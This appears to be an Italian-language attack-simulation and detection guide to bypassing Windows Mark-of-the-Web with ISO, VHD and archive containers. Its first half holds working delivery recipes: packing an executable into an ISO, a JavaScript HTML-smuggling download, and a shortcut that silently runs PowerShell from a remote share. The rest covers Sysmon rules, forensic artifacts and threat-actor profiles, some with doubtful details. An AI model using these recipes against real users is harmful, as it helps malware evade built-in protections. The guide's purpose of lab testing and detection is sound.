Bypass Mark-of-the-Web: Subvert Mark-of-the-Web via Container Files (T1553.005)

Per simulare questa tecnica in laboratorio, inizia creando un file ISO contenente un payload. Su Windows, usa PowerShell per generare un'immagine disco:

$ISOFile = "C:\temp\payload.iso"
New-ISOFile -Path $ISOFile -SourceFiles @("C:\temp\malicious.exe") -Media CDR -Title "Test"

Il file ISO erediterà il MOTW se scaricato, ma quando lo monti con Mount-DiskImage, il contenuto perde questa protezione. Per verificare la presenza del MOTW, esamina l'ADS:

dir /r C:\Downloads\file.iso

L'output mostrerà :Zone.Identifier:$DATA se presente. Dopo il mount, i file estratti non avranno questo stream.

APT29 ha perfezionato questa tecnica incorporando ISO direttamente in file HTML. Puoi replicarlo codificando l'ISO in Base64 e usando JavaScript per il download automatico:

var iso_b64 = "UEsDBAoAAA..."; // ISO in base64
var a = document.createElement('a');
a.href = "data:application/octet-stream;base64," + iso_b64;
a.download = "document.iso";
a.click();

Per Linux, crea un archivio che Windows non etichetta correttamente. Gli archivi .tar.gz spesso bypassano MOTW quando estratti con tool di terze parti:

tar -czf payload.tar.gz malicious_script.ps1

TA505 preferisce ISO con file .lnk malevoli all'interno. Crea un collegamento che esegue PowerShell nascosto:

$WshShell = New-Object -ComObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("$env:temp\update.lnk") $Shortcut.TargetPath = "powershell.exe" $Shortcut.Arguments = "-WindowStyle Hidden -ExecutionPolicy Bypass -File \server\share\script.ps1" $Shortcut.Save()

La detection DET0257 richiede correlazione tra eventi di mount/estrazione e successive esecuzioni. Configura Sysmon per catturare EventCode 11 (FileCreate) filtrando le estensioni critiche:

<RuleGroup name="" groupRelation="or">
  <FileCreate onmatch="include">
    <TargetFilename condition="end with">.iso</TargetFilename>
    <TargetFilename condition="end with">.vhd</TargetFilename>
  </FileCreate>
</RuleGroup>

Il vero valore sta nel correleare questi eventi con ProcessCreate (EventCode 1) entro una finestra temporale definita. Se un processo viene lanciato da una directory temporanea entro 5 minuti dal mount di un ISO, genera un alert ad alta priorità.

Per ridurre i falsi positivi, mantieni una whitelist dei tool di estrazione aziendali legittimi nel parametro [TrustedExtractionTools]. WinRAR, 7-Zip aziendale e strumenti di deployment vanno esclusi dalla detection.

Windows Security Log registra gli accessi ai file montati tramite EventCode 4663. Correla questi eventi con la mancanza di Zone.Identifier verificando:

Get-Content -Path "extracted_file.exe" -Stream Zone.Identifier -ErrorAction SilentlyContinue

Se il comando non ritorna nulla su un file appena estratto da un container scaricato, hai identificato un potenziale bypass. QakBot usa esattamente questa tecnica, distribuendosi in ISO che Windows monta senza propagare MOTW.

Gli artefatti del bypass MOTW si trovano in diversi punti del filesystem. Inizia esaminando il registro per mount recenti di immagini disco:

HKLM\SYSTEM\MountedDevices

Contiene tracce di tutti i volumi montati, incluse ISO e VHD. Correla questi timestamp con la creazione di file nelle directory temporanee dell'utente.

Il Journal USN registra ogni operazione su NTFS. Cerca pattern di estrazione massiva da singoli file:

fsutil usn readjournal C: csv | findstr /i ".iso .vhd"

APT38 lascia tracce caratteristiche: monta VHD, estrae payload in %APPDATA%, poi smonta immediatamente. Questa sequenza appare nel journal entro pochi secondi.

Per ricostruire l'attacco completo, esamina i Prefetch files. Se vedi MOUNTVOL.EXE-[hash].pf seguito da esecuzioni di file da percorsi non standard, hai la smoking gun. I timestamp dei prefetch sono affidabili per la timeline.

Amadey modifica direttamente Zone.Identifier settandolo a zero invece di rimuoverlo. Cerca ADS con contenuto anomalo:

Get-Item -Path C:* -Stream * | Where {$_.Stream -eq "Zone.Identifier"} | Get-Content

Valori diversi da 3 (Internet) o 4 (Restricted) indicano manipolazione.

APT29 (Cozy Bear) rappresenta l'elite russa del cyber-spionaggio. La loro implementazione del bypass MOTW mostra sofisticazione: embedded ISO in HTML con rendering dinamico JavaScript. Questo gruppo evolve costantemente le tecniche, aspettati varianti con nuovi formati container.

APT38 (Lazarus Group nordcoreano) usa il bypass per campagne finanziarie. I loro VHD contengono tipicamente trojan bancari con funzionalità di lateral movement. La firma distintiva è l'uso di nomi file che imitano software legittimo coreano.

TA505 opera diversamente: criminali finanziari che distribuiscono massa. I loro ISO contengono catene di .lnk che scaricano payload secondari. Monitorano costantemente i tassi di rilevamento e cambiano formato container quando necessario.

L'overlap nei tool è interessante: sia APT29 che APT38 usano legittimi software di virtualizzazione per creare VHD. Questo suggerisce accesso a risorse IT professionali, non semplici criminali.

Il trend emergente sono formati container esotici. Dopo ISO e VHD, aspettati VMDK (VMware) e formati di backup proprietari. Gli attaccanti testano costantemente quali formati Windows monta senza propagare MOTW.

Tecnica documentata nel framework MITRE ATT&CK con evidenze da operazioni reali di APT29, APT38 e TA505. Detection patterns basati su telemetria Windows Security e Sysmon. Mitigazioni validate in ambienti enterprise con focus su Registry modification e Application Control.